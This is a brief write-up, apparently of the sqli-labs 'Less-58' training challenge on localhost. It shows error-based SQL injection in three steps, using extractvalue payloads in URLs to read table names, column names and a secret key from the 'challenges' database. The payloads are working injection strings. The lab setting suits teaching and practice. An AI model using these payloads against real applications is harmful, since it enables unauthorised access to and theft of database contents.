After executing sql statement, and did not return data out of the database, so we here can not use union joint injection, used here error injection. But note that there are only five opportunities to try.
Find the table name
http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+
Find the column name
http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='dzgnt6f0xz'),0x7e))--+
Find the key
http://127.0.0.1/sql/Less-58/?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(secret_GYDQ) from dzgnt6f0xz),0x7e))--+